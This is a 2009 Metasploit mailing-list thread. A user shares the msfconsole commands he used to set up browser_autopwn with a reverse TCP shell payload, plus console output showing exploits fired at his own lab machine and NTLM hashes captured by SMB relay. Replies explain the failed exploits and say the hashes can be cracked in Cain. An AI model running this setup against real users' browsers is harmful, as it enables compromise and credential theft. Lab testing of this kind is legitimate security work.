Metasploit mailing list archives
IE/FF Pawnage.
From: wfdawson at bellsouth.net (wfdawson at bellsouth.net)
Date: Mon, 05 Jan 2009 01:27:38 +0000
Hi all,

Please pardon my apparent ignorance, but can someone point me to a how-to or suitable hint-age on translating the 49-character LMHASH and NTHASH output in the message below into something that Cain will accept?

Thanks in advance!

-------------- Original message from egypt at metasploit.com: --------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Browser autopwn hasn't been updated to use the new IE7 XML vulnerability yet; what you are seeing is MS06-071. The Firefox exploits included with Metasploit are all relatively old so an installation newer than 1.5 would be unexploitable.

I'm not sure why so many smb_relay attempts happened in this case but those hashes can be put right into Cain for cracking.

The reason browser autopwn didn't try other exploits is the whole point of browser autopwn: it uses javascript to determine what exploits the target might be vulnerable to.

Hope this helped.
egypt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.7 (GNU/Linux)

iD8DBQFJYFw8ABHabZqEWJ0RAjMDAJ4xtdTAzt/0Qr7N5m5Yumplh2TQ2ACdFdyn
08qRyxk4ZEX0xDBRwYuT2+Q=
=ifdF
-----END PGP SIGNATURE-----

On Sat, Jan 3, 2009 at 1:32 PM, Richard Miles wrote:

Hi

I'm testing browser_autopwn. I updated Metasploit with SVN and basically I used these commands:

msf> use auxiliary/server/browser_autopwn
msf> setg AUTOPWN_HOST 10.1.1.2
AUTOPWN_HOST => 10.1.1.2
msf> setg AUTOPWN_PORT 8888
AUTOPWN_PORT => 8888
msf> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
msf> set LHOST 10.1.1.2
LHOST => 10.1.1.2
msf> set LPORT 4500
LPORT => 4500
msf> set SRVPORT 8888
SRVPORT => 8888
msf> set URIPATH /ads
URIPATH => /ads
msf> set PAYLOAD windows/shell/reverse_tcp
msf> run

I tried to exploit my IE 7.0.5730.13 and Firefox 3.0.5. I installed my FF more than 1 month ago, and for IE I only installed IE7 and never updated it, and it was unable to exploit.

The output in msf console looks like this:

msf auxiliary(browser_autopwn) >
[*] Request '/ads' from 10.1.1.2:2166
[*] Recording detection from User-Agent
[*] Browser claims to be MSIE 7.0, running on Windows XP
[*] Responding with exploits
[*] Received 10.1.1.2:2167 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 10.1.1.2:2167 \
[*] Received 10.1.1.2:2167 HOME\Administrator LMHASH:856c3a815783b659220ea52f71f53677cb50bb89038cd09e NTHASH:d4c133a04a549e9746de954717cb3c7b82ce28859ab3d749 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 10.1.1.2 as HOME\Administrator...
[*] Failed to authenticate as HOME\Administrator...
[*] Sending Access Denied to 10.1.1.2:2167 HOME\Administrator
[*] Received 10.1.1.2:2170 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 10.1.1.2:2170 \
[*] Received 10.1.1.2:2170 HOME\Administrator LMHASH:0e3464274565da1174376257ea92a3705d15b8f67a548aedd NTHASH:4c5ba976581ae17674c2c4d41b3c9a7121764f98fc3e8575 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 10.1.1.2 as HOME\Administrator...
[*] Failed to authenticate as HOME\Administrator...
[*] Sending Access Denied to 10.1.1.2:2170 HOME\Administrator
[*] Received 10.1.1.2:2172 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 10.1.1.2:2172 \
[*] Received 10.1.1.2:2172 HOME\Administrator LMHASH:1ea66a6fb256fdec1c7ab9c4efd3fdda6f52d1f7157f6ba8b NTHASH:a1f355fa0144e541351627cbf9750cd0c50c327d858cf15e OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 10.1.1.2 as HOME\Administrator...
[*] Failed to authenticate as HOME\Administrator...
[*] Sending Access Denied to 10.1.1.2:2172 HOME\Administrator
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.1.1.2:2166...
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.1.1.2:2174...
[*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6cHQtYnI6eDg2Ok1TSUU6Ny4w' from 10.1.1.2:2166
[*] Recording detection from JavaScript
[*] Report: Windows:XP:SP2:pt-br:x86:MSIE:7.0
[*] Sending exploit HTML to 10.1.1.2:2166...
[*] Sending Internet Explorer XML Core Services HTTP Request Handling to 10.1.1.2:2174...
[*] Request '/ads' from 10.1.1.2:2166
[*] Recording detection from User-Agent
[*] Browser claims to be MSIE 7.0, running on Windows XP
[*] Responding with exploits
[*] Received 10.1.1.2:2182 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 10.1.1.2:2182 \
[*] Received 10.1.1.2:2182 HOME\Administrator LMHASH:18f4dc5457ecec5995b3ac9a477acc7e74464cb82d2831a NTHASH:ed2322d3695592c67bb59a5f5dcb7c947b0ade6034824394 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 10.1.1.2 as HOME\Administrator...
[*] Failed to authenticate as HOME\Administrator...
[*] Sending Access Denied to 10.1.1.2:2182 HOME\Administrator
[*] Received 10.1.1.2:2184 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 10.1.1.2:2184 \
[*] Received 10.1.1.2:2184 HOME\Administrator LMHASH:d889289cd0d4d8637422d39510e48ea325d61de7ad4fc8b6 NTHASH:bc5888b4afe06c19118b0eb5f176535885dbe44eddc87f15 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 10.1.1.2 as HOME\Administrator...
[*] Failed to authenticate as HOME\Administrator...
[*] Sending Access Denied to 10.1.1.2:2184 HOME\Administrator
[*] Received 10.1.1.2:2186 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 10.1.1.2:2186 \
[*] Received 10.1.1.2:2186 HOME\Administrator LMHASH:87f9d52ed9280f9a453f8b6827f277729ecab072253de369 NTHASH:39364816918e506ddf64c022061ef871886f7ab7124f5967 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Authenticating to 10.1.1.2 as HOME\Administrator...
[*] Failed to authenticate as HOME\Administrator...
[*] Sending Access Denied to 10.1.1.2:2186 HOME\Administrator
[*] Sending Apple QuickTime 7.1.3 RTSP URI Buffer Overflow to 10.1.1.2:2166...
[*] Sending iPhone MobileSafari LibTIFF Buffer Overflow to 10.1.1.2:2188...
[*] Request '/ads?sessid=V2luZG93czpYUDpTUDI6cHQtYnI6eDg2Ok1TSUU6Ny4w' from 10.1.1.2:2166
[*] Recording detection from JavaScript
[*] Report: Windows:XP:SP2:pt-br:x86:MSIE:7.0
[*] Sending Internet Explorer XML Core Services HTTP Request Handling to 10.1.1.2:2166...
[*] Sending exploit HTML to 10.1.1.2:2191...

Why did it only test the XML flaw on IE? By the way, given how long I have not updated, this exploit should have worked, no? The FF was equally unexploitable. Strange, it only gave 2 or 3 shots and stopped. Did I do something wrong? This machine is Win XP SP2 with Avast.

Also, I saw it output NTLM hashes from the box several times, using smbrelay I believe, right? Well, why are these hashes different every time? Is it the NTLM challenge? If yes, would it not be good to add the challenge to the output, because at least we could try to use it to brute-force the password of the account.

Thank you and have a happy new year.

_______________________________________________
http://spool.metasploit.com/mailman/listinfo/framework
Current thread:
- IE/FF Pawnage. Richard Miles (Jan 03)
- IE/FF Pawnage. egypt at metasploit.com (Jan 03)
- IE/FF Pawnage. wfdawson at bellsouth.net (Jan 04)
- IE/FF Pawnage. H D Moore (Jan 04)
- IE/FF Pawnage. wfdawson at bellsouth.net (Jan 04)
- IE/FF Pawnage. egypt at metasploit.com (Jan 03)